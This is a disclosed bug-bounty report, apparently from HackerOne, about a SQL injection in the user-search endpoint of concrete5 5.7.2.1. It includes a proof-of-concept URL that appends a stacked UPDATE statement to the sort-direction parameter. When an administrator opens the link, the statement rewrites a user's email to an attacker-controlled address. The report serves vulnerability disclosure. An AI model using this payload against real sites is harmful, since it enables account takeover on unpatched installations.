SQL injection in conc/index.php/ccm/system/search/users/submit

Disclosed: 2016-04-26 23:29:07 By yujitounai To concretecms
Unknown
Vulnerability Details
Hello. I found SQL injection in conc/index.php/ccm/system/search/users/submit PoC is below When User login as Administrator the user open this link http://172.20.0.49/conc/index.php/ccm/system/search/users/submit?&ccm_order_by=u.uEmail&ccm_order_by_direction=desc;UPDATE%20%60conc501%60.%60Users%60%20SET%20%60uEmail%60%20=%20%27user@evilhost%27%20WHERE%20%60users%60.%60uID%60%20=%202;-- and update user's email address. and I think I can do various things ;) I tested to work concrete5 5.7.2.1 on Apache(using ammps) Windows8
Actions
View on HackerOne
Report Stats
  • Report ID: 38778
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report